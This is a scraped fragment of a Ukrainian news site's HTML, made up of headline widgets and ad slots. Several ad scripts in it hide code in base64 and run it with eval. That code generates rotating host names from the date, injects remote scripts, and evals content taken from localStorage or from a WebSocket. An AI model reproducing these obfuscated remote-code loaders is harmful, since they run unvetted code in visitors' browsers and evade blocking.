alt="Трагедия в Одессе: в городе на гипермаркет рухнул самолет" src="https://enovosty.com/wp-content/uploads/2020/06/1592390015-3033.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/1706-tragediya-v-odesse-v-gorode-na-gipermarket-ruxnul-samolet">Трагедия в Одессе: в городе на гипермаркет рухнул самолет</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_incidents/full/2206-ochevidec-raskryla-tragicheskie-detali-vzryva-v-kieve"><img width="142" height="88" alt="Очевидец раскрыла трагические детали взрыва в Киеве" src="https://enovosty.com/wp-content/uploads/2020/06/gaz1.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/2206-ochevidec-raskryla-tragicheskie-detali-vzryva-v-kieve">Очевидец раскрыла трагические детали взрыва в Киеве</a></div></td></tr><tr><td class="view"><span><i></i>1890</span></td><td class="view"><span><i></i>1578</span></td><td class="view last"><span><i></i>1223</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div><br> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_economy/full/2306-v-ukraine-nuzhno-privatizirovat-99-kompanij-amelin" rel="bookmark">В Украине нужно приватизировать 99% компаний, - Амелин</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/2306-svobodnaya-ekonomicheskaya-zona-instrument-privlecheniya-investicij-i-sozdaniya-rabochix-mest-ekspert" rel="bookmark">Свободная экономическая зона - инструмент привлечения инвестиций и создания рабочих мест, - эксперт</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/ekonomika/full/2306-anatolij-amelin-ekonomicheskaya-model-yuzhnoj-korei-optimalnyj-put-dlya-ukrainy" rel="bookmark">Анатолий Амелин: Экономическая модель Южной Кореи – оптимальный путь для Украины</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/4809225" rel="bookmark">Суд принял решение по Мангеру</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/ekonomika/full/1206-andrej-dligach-obratilsya-k-zelenskomu-esli-zavoevat-afriku-segodnya-zavtra-uroven-zhizni-v-ukraine-budet-kak-v-polshe" rel="bookmark">Андрей Длигач обратился к Зеленскому: Если завоевать Африку сегодня, завтра уровень жизни в Украине будет как в Польше</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/2005-zelenskij-anonsiroval-sozdanie-edinogo-ofisa-investicij" rel="bookmark">Зеленский анонсировал создание единого офиса инвестиций</a><br /></td> </tr><tr></tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
--><div id="WHwvwcq55RuJtgZm5orj" data-type="0" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'hvnwoeo.pro';</script><script src="//hvnwoeo.pro/eXu/EjSt.js" ></script><br><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости экономики</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4249,30426', 4249, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4249,30426', 4249, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4249,30426', 4249, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_economy/full/1806-stalo-izvestno-skolko-budet-stoit-obrazovanie-po-kontraktu-v-ukraine">Стало известно, сколько будет стоить образование "по контракту" в Украине (5574)</a></h3><h3 class="press"><a href="https://enovosty.com/ekonomika/full/2006-sergej-fursa-ukrainskaya-vlast-gotovitsya-kinut-mvf-i-privesti-stranu-k-defoltu">Сергей Фурса: Украинская власть готовится «кинуть» МВФ и привести страну к дефолту (5314)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2206-v-ukraine-rezko-sokratyatsya-zarplaty-skolko-budut-poluchat-ukraincy">В Украине резко сократятся зарплаты. Сколько будут получать украинцы? (2308)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/1906-v-ukraine-proveryat-vsex-lgotnikov-i-pensionerov-komu-pridetsya-vernut-dengi">В Украине проверят всех льготников и пенсионеров. Кому придется вернуть деньги? (2021)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/1906-shtraf-za-neuplatu-kommunalki-vyrastet-v-shest-raz">Штраф за неуплату коммуналки вырастет в шесть раз (1604)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/1806-ukraincev-zhdut-syurprizy-s-cenami-na-gaz">Украинцев ждут "сюрпризы" с ценами на газ (1089)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2306-v-ukraine-nachinayut-avtomaticheski-naznachat-pensii">В Украине начинают автоматически назначать пенсии (731)</a></h3><h3 class="press"><a href="https://enovosty.com/ekonomika/full/2306-anatolij-amelin-ekonomicheskaya-model-yuzhnoj-korei-optimalnyj-put-dlya-ukrainy">Анатолий Амелин: Экономическая модель Южной Кореи – оптимальный путь для Украины (529)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2006-vmeshivayas-v-rabotu-nbu-verxovnaya-rada-mozhet-sorvat-sotrudnichestvo-s-mvf-i-tolknut-stranu-k-defoltu-fursa">Вмешиваясь в работу НБУ, Верховная Рада может сорвать сотрудничество с МВФ и толкнуть страну к дефолту, - Фурса (404)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2206-kogda-ukraincy-mogut-vernut-polnuyu-stoimost-tovara">Когда украинцы могут вернуть полную стоимость товара (379)</a></h3></div> </div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4351540"><a href="https://enovosty.com/armiya/full/745-protivotankovyj-raketnyj-kompleks-shturm-s" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/04/shturm_c2_edit2-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/04/shturm_c2_edit2-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/04/shturm_c2_edit2-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/04/shturm_c2_edit2.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/745-protivotankovyj-raketnyj-kompleks-shturm-s" >Противотанковый ракетный комплекс «Штурм-С»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4389424"><a href="https://enovosty.com/armiya/full/168-perenosnoj-zenitno-raketnyj-kompleks-starburst-velikobritaniya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/09/starburst-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/09/starburst-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/09/starburst-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/09/starburst.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/168-perenosnoj-zenitno-raketnyj-kompleks-starburst-velikobritaniya" >Переносной зенитно-ракетный комплекс Starburst (Великобритания)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4399844"><a href="https://enovosty.com/armiya/full/788-broneavtomobil-amx-10rc-franciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/10/amx_10rc-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/10/amx_10rc-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/10/amx_10rc-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/10/amx_10rc.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/788-broneavtomobil-amx-10rc-franciya" >Бронеавтомобиль AMX-10RC (Франция)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4468598"><a href="https://enovosty.com/armiya/full/557-broneavtomobil-rg-31-charger-kanada" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/09/RG-31_Charger--101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/09/RG-31_Charger--101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/09/RG-31_Charger--112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/09/RG-31_Charger-.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/557-broneavtomobil-rg-31-charger-kanada" >Бронеавтомобиль RG-31 Charger (Канада)</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4332257"><a href="https://enovosty.com/person/full/561-donij-oles" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/12/doniy_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/12/doniy_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/12/doniy_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/561-donij-oles" >Доний<br /> Олесь</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4368532"><a href="https://enovosty.com/person/full/487-tarasyuk-boris" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/06/tarasuk_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/06/tarasuk_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/06/tarasuk_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/487-tarasyuk-boris" >Тарасюк<br /> Борис</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4438259"><a href="https://enovosty.com/person/full/458-artem-sytnik" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/04/Sytnik-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/04/Sytnik-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/04/Sytnik.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/458-artem-sytnik" >Артем<br /> Сытник</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4655540"><a href="https://enovosty.com/person/full/1911-tryudo-dzhastin" ><img width="105" height="88" src="https://enovosty.com/wp-content/uploads/2017/11/trudo-112x94.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2017/11/trudo-112x94.jpg 112w, https://enovosty.com/wp-content/uploads/2017/11/trudo.jpg 263w" sizes="(max-width: 105px) 100vw, 105px" /></a><a class="postTitle" href="https://enovosty.com/person/full/1911-tryudo-dzhastin" >Трюдо<br /> Джастин</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_abroad/full/2406-kogda-tvoya-babushka-koroleva-yarkoe-foto-princa-uilyama-i-elizavety-ii-foto">Когда твоя бабушка королева: яркое фото принца Уильяма и Елизаветы II (ФОТО) (8306)</a></p><p class="press"><a href="https://enovosty.com/zdorove/full/2306-uchenyj-iz-kitaya-nazval-sroki-zaversheniya-epidemii-covid-19">Ученый из Китая назвал сроки завершения эпидемии COVID-19 (3941)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/2406-v-ssha-pokazali-kak-proxodili-ispytaniya-novoj-termoyadernoj-bomby-b61-12-s-borta-f-35a-foto">В США показали, как проходили испытания новой термоядерной бомбы B61-12 с борта F-35A (ФОТО) (3745)</a></p><p class="press"><a href="https://enovosty.com/news-culture/full/2306-odno-lico-neumelyj-restavrator-izurodoval-znamenitnyj-shedevr-foto">"Одно лицо": неумелый реставратор изуродовал знаменитный шедевр (ФОТО) (2272)</a></p><p class="press"><a href="https://enovosty.com/uk/news-auto-ukr/full/2406-ukrainskim-vodiyam-povidomili-yak-mozhna-diznatisya-pro-svoi-shtrafi-za-porushennya-pdr">Українським водіям повідомили, як можна дізнатися про свої штрафи за порушення ПДР (2105)</a></p><p class="press"><a href="https://enovosty.com/uk/news_society-ukr/full/2406-ukrainski-morski-kotiki-pid-chas-navchan-proletili-na-parashutax-15-km-video">Українські морські котики під час навчань пролетіли на парашутах 15 км (ВІДЕО) (1900)</a></p><p class="press"><a href="https://enovosty.com/news_incidents/full/2406-bujstvo-stixii-na-zapadnoj-ukraine-troe-pogibshix-zablokirovannye-trassy-i-400-mln-na-vosstanovlenie">Буйство стихии на Западной Украине: трое погибших, заблокированные трассы и 400 млн на восстановление (1873)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2306-vsegda-na-pozitive-zabavnye-sobaki-kotorye-lyubyat-podurachitsya-foto">Всегда на позитиве: забавные собаки, которые любят подурачиться (ФОТО) (1799)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2306-na-chernigovshhine-ispytyvayut-boepripasy-k-raketnomu-kompleksu-korsar-foto">На Черниговщине испытывают боеприпасы к ракетному комплексу "Корсар" (ФОТО) (1532)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/2306-ukrainskim-voditelyam-napomnili-o-shtrafax-za-nevnesenie-gbo-v-texpasport">Украинским водителям напомнили о штрафах за невнесение ГБО в техпаспорт (1496)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/2306-pochetnyj-konsul-francii-sergej-polituchij-vozmozhno-zameshan-v-korrupcionnyx-i-moshennicheskix-sxemax">Почетный консул Франции Сергей Политучий возможно замешан в коррупционных и мошеннических схемах</a></p><p class="press"><a href="https://enovosty.com/publications/full/2104-uroki-torgovyx-rassledovanij-ot-minekonomrazvitiya-i-pochemu-private-eto-ne-privat">Уроки торговых расследований от Минэкономразвития – и почему Private это не Приват</a></p></div><div id='div-2'><script type='text/javascript'>googletag.cmd.push(function() {googletag.display('div-2');});</script></div><div id="adriver_banner_C3"></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/2901-publichni-zakupivli-nareshti-prozzoro-chi-toj-zhe-ruchnyak"><img alt="Публічні закупівлі: нарешті «prozzoro» чи той же «ручняк»?" src="https://enovosty.com/wp-content/uploads/2020/01/pavlichenko-101x112.jpg"><div>Данило Павличенко</div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/2901-publichni-zakupivli-nareshti-prozzoro-chi-toj-zhe-ruchnyak">Публічні закупівлі: нарешті «prozzoro» чи той же «ручняк»?</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/2901-publichni-zakupivli-nareshti-prozzoro-chi-toj-zhe-ruchnyak"> В кінці 2019 року в Законі «Про публічні закупівлі» прийняли зміни (законопроект №1076), які вступлять в силу у квітні 2020 року. Гасла до його прийняття ...</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_abroad/full/2406-kogda-tvoya-babushka-koroleva-yarkoe-foto-princa-uilyama-i-elizavety-ii-foto">Когда твоя бабушка королева: яркое фото принца Уильяма и Елизаветы II (ФОТО) (8341)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/2206-koronavirus-oslabevaet-i-vskore-mozhet-ischeznut-italyanskij-vrach">Коронавирус ослабевает и вскоре может исчезнуть, - итальянский врач (8058)</a></p><p class="press"><a href="https://enovosty.com/news_incidents/full/1806-v-yaponii-obnaruzhili-telo-ukrainskogo-sportsmena-kotorogo-iskali-s-fevralya">В Японии обнаружили тело украинского спортсмена, которого искали с февраля (7645)</a></p></div></div></div><br><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br> <div id="riainfo_e77f01cd5a912b7be06984da8aae869f" onclick="trackOutboundLink(this, 'AutoRia', 'auto.ria.com');"></div><br><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div id="conteiner_dld49vksidf3"><script type="text/javascript" async src="//mobpartnerka02.ru/019/app.js"></script></div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><div id="MIXADV_7463" class="MIXADVERT_NET"></div> <script>var node7463 = document.getElementById("MIXADV_7463");if( node7463 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=7463&r="+Math.random();
node7463.parentNode.appendChild(script);script.onerror = function(){window.eval(
atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDc0NjMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNzQ2My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTc0NjMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTc0NjMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjc0NjMiKSkgfSwgNTAwMCk7ICA7fTsg")
